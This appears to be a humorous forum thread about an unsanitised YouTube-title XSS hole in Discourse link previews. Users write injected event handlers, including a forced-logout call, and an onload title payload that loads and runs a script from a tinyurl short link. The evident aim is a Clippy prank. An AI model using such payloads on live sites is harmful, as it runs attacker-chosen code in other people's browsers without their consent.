DiscoBalls doesn't sanitise youtube titles
-
Continuing the discussion from In other news today...:
https://www.youtube.com/watch?v=d10k3iiZ_xk
I'm really beginning to like this guy.
What? Where did the rest of the title go... Oh. oh my.
Well let's see if this turns into another :exploit:
https://youtu.be/iUAXzx8gjyc
Yes!
-
Time for fa-spin on meta.d?
-
As much as I dislike I'd still report stuff like this
-
Your OneBox fucked beats my OneBox fuckup. Well played, sir.
Should I post a bug on Meta.derp?
Filed under: Or should I post a carefully crafted YouTube video?
-
At least it didn't get deleted
-
-
Once they fix onmouseover, try
- onmouseenter
- onmouseleave
Once they fix those, start digging into some of the customer DipYork events that must exist like:
- onBeforeAjaxBullshit
- onAfterJellyPotato
Filed under: On Beyond Golden Pond
-
And here's a very helpful post:
Did that topic get hidden? I'm not finding it on meta.derp.
-
Did that topic get hidden?
Also hilariously fast response time: it got unlisted within the first minute of posting it.
-
Ah, I misunderstood @Salamander's post. I thought he meant YT unlisted the video. Reading comprehension fail.
-
-
Very reasonable thing to do. I wouldn't be surprised if YT scanned uploaded videos for stuff like that, though; given how aggressively they ContentID stuff.
-
Nah, youtube was so on the ball, it removed the first video I tried before it even finished uploading it. Twice.
The first time it complained that I had already uploaded the same video before, the second time I just tried to use a sample video that came with windows and it contentID'd it.
Then I just found some random site to convert the Discoball to a video.
-
YT scanned uploaded videos for stuff like that,
Strangely enough, I don't think they do filter out titles like that. I do know they decrease the findability of videos with titles similar to file names (i.e. "blahblah.mov").
After all, who would expect a site to just spit out the title directly to the page's source?
Edit: 'd and corrected.
-
After all, who would expect a site to just spit out the title directly to the page's source?
Yeah, who would be foolish enough to use untrusted
user3rd-party input like that without sanitizing it?
-
it got unlisted within the first minute of posting it.
How much do you want to bet there is never any acknowledgement that the bug existed, even after it's fixed?
-
-
This post is deleted!
-
Nice find though!
-
We've known about this for ages, but I don't think anybody has bothered to demonstrate an XSS with it until now.
-
FTFM.
-
Try
$('*:empty,p,span,button,div.lazyYT').addClass('fa-spin')
-
Oh god, the lag...
-
Yeah, who would be foolish enough to use untrusted user3rd-party input like that without sanitizing it?
Yeah, who would have ever thought that would be a bad idea?
@Me. It was fucking me, over two years ago said:
Populating a page with untrusted 3rd party content. What could possibly go wrong with that?
-
-
@Lorne_Kates said:
What is this "fixed" you speak of?
They have generally be pretty prompt at fixing (or at least putting a more-or-less adequate band-aid on) security problems. They haven't always done a good job of looking for related vulnerabilities that should be fixed at the same time, and they certainly haven't fixed the underlying design issues that led to the specific vulnerabilities, but they have patched the actual vulnerabilities as reported.
-
: Being able to call
onmouseover="Discourse.user.logout()"
for image links isCLOSED_AS_DESIGNED
. You're just doing it wrong if you don't enjoy that.
-
{sigh} Seriously, @riking ? Fucking seriously?
-
WTF did he do to make it not load the title or preview image?
-
Some very helpful time stamps there.
I guess I'll just manually figure out where you both live and then convert the time zones to where I live. Thanks Diss&Curse!
-
WTF did he do to make it not load the title or preview image?
He did it wr-- {checks raw}
Fuck. DiscoFatigue is hitting hard tonight.
-
Some very helpful time stamps there.
Wha-- {looks up} Oh Jesus Christ's Cross Shoved in a Cocksocket-- this fucking forum. Fuck this forum. Fuck it hard and fuck it now.
@apapadimoulis can we just burn the server to the ground completely already?
-
Don't worry, a replacement forum is on it's way. And this time it's written in EVEN MORE JAVASCRIPT!
-
NodeBB Confirmed!
Nah, we all knew that. But still :)
-
Don't worry, a replacement forum is on it's way. And this time it's written in EVEN MORE JAVASCRIPT!
Javascript is a tool. I'm okay with a building with a glass exterior. I'm not okay with a powdered-glass enema.
-
@Lorne_Kates said:
Javascript is a tool.
That's generous. Well unless, you're using the more expansive definition of "tool" which includes things like "rocks" and "twigs", that animals use to crack open nuts and build nests.
Then I guess, yes, it's a tool. And it can be used to build things. Just like cow pies can be used as a tool to build a house. Granted, everythign is still shit... but hey, something was built.
-
-
Even the spellaring is shit!
OK, first off, what the fuck. In every other text box, I get a red squigly when I have a typo. Aparantly not in this one. Is there something that Diso is doing that has disabled this?
Whatever. i'm not a great spleller, but JavaScript is infectious and makes all the things around it even worse. Including my spelling.
-
Aparantly not in this one. Is there something that Diso is doing that has disabled this?
Do you have to ask?
Also, go mis-spell something in a post title.
-
Is there something that Diso is doing that has disabled this?
Yes. It cancels spellcheck until it's done checking for things like @mentions and :emoji:, and until any ajax requests have completed.
-
Oh god, this is awesome.
Can you make one with
onload
set to run this? (skip the jQuery bit, it's already loaded)clippy.css (1.3 KB), clippy.min.js (13.0 KB)
Oh, and after
agent.show()
you'll also want to set it to callagent.animate()
at a random time interval... say:clippy.load('Clippy', function(agent) { agent.show(); setTimeout(function reanimate() { agent.animate(); setTimeout(reanimate, Math.random() * 18e4 + 12e4); }, Math.random() * 18e4 + 12e4); });
edit: damn, the .js attachment got nuked. WTF, discourse? That's some special securi-tay.
-
Okay, renamed that .js attachment to .txt and got it working. Here's teh codez:
var link = document.head.appendChild(document.createElement("link")); link.setAttribute("rel", "stylesheet"); link.setAttribute("type", "text/css"); link.setAttribute("href", "/uploads/default/original/3X/1/e/1e901bea83a371182f6044ed58faee7f9d07225b.css"); link.setAttribute("media", "all"); link.onload = function () { var script = document.body.appendChild(document.createElement("script")); script.setAttribute("type", "text/javascript"); script.setAttribute("src", "/uploads/default/original/3X/c/a/ca9ac19092d2be4c272163b184b01073b37474a0.txt"); script.onload = function () { clippy.load('Clippy', function(agent) { agent.moveTo(window.innerWidth - 200, window.innerHeight - 200); agent.show(); setTimeout(function reanimate() { agent.animate(); setTimeout(reanimate, Math.random() * 9e4 + 3e4); }, Math.random() * 9e4 + 3e4); }); }; };
... how long can a YouTube title be?
Might have to encapsulate that into the script, and just have the YT title create the script element for it.
-
Wonder if it'd work with Cornify.js?
-
...probably... I'm kind of enjoying having my very own Clippy here, though.
-
... how long can a YouTube title be?
Probably not that long I would think (100 characters according to some results). Might have to reference the video, and have the code element
aval()
'd for it to work....
-
Huh... okay, what if... this has the code to initialize the agent at the end of it:
clippy.min.txt (13.9 KB) https://tinyurl.com/jnj52xh
to invoke:
with(document){body.appendChild(createElement("script")).src="https://tinyurl.com/jnj52xh"}
...eh, still that's probably too long if the limit is 100 characters.
-
probably too long
It appears to be 91 character! Seems legit?
Edit: Though there's an error, it loads the CSS from the caller's domain, so if it's not what.thedailywtf, it won't load.
-
But I think you'd have to make the title this:
" onload="with(document){body.appendChild(createElement('script')).src='https://tinyurl.com/jnj52xh'}"
which would be too long.
there's an error, it loads the CSS from the caller's domain, so if it's not what.thedailywtf, it won't load.
It works from the browser console in Firefox. Didn't at first, until I made the tinyurl use https, but it does after.
-
with(document){body.appendChild(createElement('script')).src
Don't we have jQuery loaded? Could this be made simpler (idk, don't have the time)
" onload="$(body).append($('<script>').src='https://tinyurl.com/jnj52xh'"
-
You have some inbalanced braces, but even after fixing that my console says no.